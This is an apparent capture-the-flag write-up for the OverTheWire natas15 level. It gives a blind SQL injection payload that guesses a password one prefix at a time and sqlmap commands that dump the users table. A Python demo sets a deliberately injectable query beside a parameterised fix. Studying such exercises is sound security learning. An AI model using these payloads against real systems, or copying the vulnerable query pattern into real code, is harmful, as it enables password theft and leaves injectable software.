natas15
Submitting natas16 as the username returns "This user exists.", while other names such as natas15 return "This user doesn't exist.". The users table contains a password column of type varchar(64). Using

natas16" AND password LIKE BINARY "{known + guess}%" #

as the injection payload, where LIKE in a WHERE clause matches rows that fit the given pattern, BINARY makes the comparison case-sensitive, and % stands for zero, one or more arbitrary characters, the response tells whether a value beginning with a particular alphanumeric prefix exists in the password column; each confirmed character is appended to the known part and the next one is guessed. After some waiting, the login password for the next level was successfully obtained.

The same extraction can be automated with sqlmap, using "This user exists" as the string that marks a true response: first confirm the injection point, then list the databases, then the tables in natas15, and finally dump users:
sqlmap -u "http://natas15.natas.labs.overthewire.org/index.php" --string="This user exists" --auth-type Basic --auth-cred "natas15:密碼自行填入" --data "username=natas16*" -p username --charset "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" --level 5 --risk 3 --random-agent --batch
sqlmap -u "http://natas15.natas.labs.overthewire.org/index.php" --string="This user exists" --auth-type Basic --auth-cred "natas15:密碼自行填入" --data "username=natas16*" -p username --charset "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" --level 5 --risk 3 --random-agent --batch --dbs
sqlmap -u "http://natas15.natas.labs.overthewire.org/index.php" --string="This user exists" --auth-type Basic --auth-cred "natas15:密碼自行填入" --data "username=natas16*" -p username --charset "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" --level 5 --risk 3 --random-agent --batch -D natas15 --tables
sqlmap -u "http://natas15.natas.labs.overthewire.org/index.php" --string="This user exists" --auth-type Basic --auth-cred "natas15:密碼自行填入" --data "username=natas16*" -p username --charset "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" --level 5 --risk 3 --random-agent --batch -D natas15 -T users --dump
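As an added illustration, not part of the original write-up, the boolean oracle described above is reproduced against an in-memory SQLite table with a constructed password, next to the parameterised query that closes it. The adaptation to SQLite is the example's own assumption: single-quoted strings, "--" in place of MySQL's "#" comment marker, and PRAGMA case_sensitive_like in place of LIKE BINARY.

```python
import sqlite3

# Constructed stand-in for the level's users table; the password is a placeholder,
# not the real natas16 password.
SEED_USERS = [("natas16", "Wd1Qk2Tz9pBx7LmA3nVs5RcE8yHf0GjK")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username varchar(64), password varchar(64))")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SEED_USERS)
    # MySQL's LIKE BINARY compares case-sensitively; SQLite needs this pragma for that.
    conn.execute("PRAGMA case_sensitive_like = ON")
    return conn


def vulnerable_lookup(conn, username):
    # Mirrors the level's flaw: the submitted name is pasted straight into the SQL text,
    # so a quote in the input ends the string and anything after it becomes SQL.
    query = "SELECT * FROM users WHERE username='%s'" % username
    try:
        rows = conn.execute(query).fetchall()
    except sqlite3.Error:
        return "Error in query."
    return "This user exists." if rows else "This user doesn't exist."


def safe_lookup(conn, username):
    # Parameterised form: the value travels separately from the SQL text, so the
    # same input is only ever compared as a (non-existent) username.
    rows = conn.execute("SELECT * FROM users WHERE username=?", (username,)).fetchall()
    return "This user exists." if rows else "This user doesn't exist."


def prefix_payload(prefix):
    # The write-up's payload, with SQLite's single quotes and "--" comment marker.
    return "natas16' AND password LIKE '%s%%' -- " % prefix


if __name__ == "__main__":
    db = make_db()
    for name in ("natas16", "natas15", prefix_payload("Wd"), prefix_payload("wd")):
        print(repr(name), "->", vulnerable_lookup(db, name), "|", safe_lookup(db, name))
```

The vulnerable lookup answers the prefix question through the two response strings, and the case mismatch "wd" is rejected just as LIKE BINARY would reject it; the parameterised lookup gives the same "doesn't exist" answer for every payload.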